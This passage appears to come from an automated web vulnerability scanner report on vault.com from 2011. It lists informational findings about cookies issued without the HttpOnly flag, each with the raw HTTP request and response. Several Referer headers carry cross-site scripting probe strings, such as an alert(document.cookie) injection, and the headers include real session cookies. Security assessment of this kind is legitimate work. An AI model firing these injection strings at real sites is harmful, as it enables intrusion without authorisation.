Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:44 GMT
ETag: "b48524-27fe-f212f200"
Accept-Ranges: bytes
Content-Length: 10238
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:40 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.150. http://www.vault.com/images/homepageFlash/03gradhelp.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/03gradhelp.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/03gradhelp.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utmx=199986601.00007137521316125233:2:1-1-1; __utmxx=199986601.00007137521316125233:2666322:2592000; JSESSIONID=0000RodsoOG0cpZlCSlcifaR0Rn:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.12.6.1295451480077; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:26:09 GMT
ETag: "b48520-45f6-84765240"
Accept-Ranges: bytes
Content-Length: 17910
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.151. http://www.vault.com/images/homepageFlash/04coreviews.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/04coreviews.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/04coreviews.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:26:07 GMT
ETag: "b4851f-3f23-8457cdc0"
Accept-Ranges: bytes
Content-Length: 16163
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:48 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.152. http://www.vault.com/images/homepageFlash/05college.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/05college.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/05college.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utmx=199986601.00007137521316125233:2:1-1-1; __utmxx=199986601.00007137521316125233:2666322:2592000; JSESSIONID=0000RodsoOG0cpZlCSlcifaR0Rn:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.12.6.1295451480077; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:44 GMT
ETag: "b48523-4c6c-f212f200"
Accept-Ranges: bytes
Content-Length: 19564
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:51 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.153. http://www.vault.com/images/homepageFlash/06salary.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/06salary.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/06salary.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:52 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:44 GMT
ETag: "b4852e-1de3-f212f200"
Accept-Ranges: bytes
Content-Length: 7651
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:56 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.154. http://www.vault.com/images/homepageFlash/07careerchange.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/07careerchange.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/07careerchange.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:00 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:26:08 GMT
ETag: "b4852b-3e29-84671000"
Accept-Ranges: bytes
Content-Length: 15913
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:04 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.155. http://www.vault.com/images/homepageFlash/08comm.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/08comm.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/08comm.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utmx=199986601.00007137521316125233:2:1-1-1; __utmxx=199986601.00007137521316125233:2666322:2592000; JSESSIONID=0000RodsoOG0cpZlCSlcifaR0Rn:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.12.6.1295451480077; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:55 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:26:09 GMT
ETag: "b4852a-573d-84765240"
Accept-Ranges: bytes
Content-Length: 22333
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:59 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.156. http://www.vault.com/images/homepageFlash/cadvancement.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/homepageFlash/cadvancement.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/homepageFlash/cadvancement.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utmx=199986601.00007137521316125233:2:1-1-1; __utmxx=199986601.00007137521316125233:2666322:2592000; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000RodsoOG0cpZlCSlcifaR0Rn:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.12.6.1295451480077

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:47 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:26:08 GMT
ETag: "b4852d-37ce-84671000"
Accept-Ranges: bytes
Content-Length: 14286
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:50 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

10.157. http://www.vault.com/images/icons/business-people.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/business-people.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/business-people.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:45 GMT
ETag: "b4843d-47f-f2223440"
Accept-Ranges: bytes
Content-Length: 1151
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/jpeg
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:29 GMT;path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................).$..
...[SNIP]...

10.158. http://www.vault.com/images/icons/cart-green.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/cart-green.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/cart-green.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:46 GMT
ETag: "b484ac-3c1-f2317680"
Accept-Ranges: bytes
Content-Length: 961
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:36 GMT;path=/

GIF89a.......................................s..ed.=...z.Y4.......|.........o.K...H..q.M......l.G...V.,?..7........c.<..j...m.I........p.............d......`.8g.A.....x...q.N@.................p.L....
...[SNIP]...

10.159. http://www.vault.com/images/icons/checkbox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/checkbox.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/checkbox.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:46 GMT
ETag: "b484bf-150-f2317680"
Accept-Ranges: bytes
Content-Length: 336
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:15 GMT;path=/

GIF89a................C.n...a..q.....n..x..A.m.........E.p...............L.u...............J.t.........j........S.{.....................<.i.............................................................
...[SNIP]...

10.160. http://www.vault.com/images/icons/email-y.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/email-y.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/email-y.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:42 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 16 Mar 2010 15:28:16 GMT
ETag: "10a0001-11e-a5840400"
Accept-Ranges: bytes
Content-Length: 286
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:45 GMT;path=/

.PNG
.
...IHDR................*....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE...him.....o..............5.....................&`......IDATx...... ..c.. i..o.. zw/.lf.<..l,.o.....Q...B.~.0*a.h.EdS.f.
...[SNIP]...

10.161. http://www.vault.com/images/icons/email.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/email.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/email.png HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:37:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 16 Mar 2010 15:28:16 GMT
ETag: "10a0007-11f-a5840400"
Accept-Ranges: bytes
Content-Length: 287
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/png
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:39:13 GMT;path=/

.PNG
.
...IHDR................*....tEXtSoftware.Adobe ImageReadyq.e<...0PLTEjik0t.L..............t......................A....l.....IDATx...I.. ..AEPIs.....f.}.F...'._.?.....
F.......k...a4..V.EH..
...[SNIP]...

10.162. http://www.vault.com/images/icons/featured_company_left_arrow_inactive.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/featured_company_left_arrow_inactive.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/featured_company_left_arrow_inactive.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:46 GMT
ETag: "b48497-10a-f2317680"
Accept-Ranges: bytes
Content-Length: 266
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:36 GMT;path=/

GIF89a..$....................................................................................................!.......,......$.....'.d.He:n.......h..\.C..5...T. .b*.T..M....V.U.H.....jN{h.....=p.....!.
...[SNIP]...

10.163. http://www.vault.com/images/icons/featured_company_right_arrow_active.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/featured_company_right_arrow_active.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/featured_company_right_arrow_active.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:33 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 10 Apr 2009 20:09:47 GMT
ETag: "b484b2-16f-f240b8c0"
Accept-Ranges: bytes
Content-Length: 367
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:36 GMT;path=/

GIF89a..$..)..........e.....7..'........V...................................l..G.....K..;..h..............u........y....................................................................................
...[SNIP]...

10.164. http://www.vault.com/images/icons/gold-lock2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/icons/gold-lock2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/gold-lock2.jpg HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
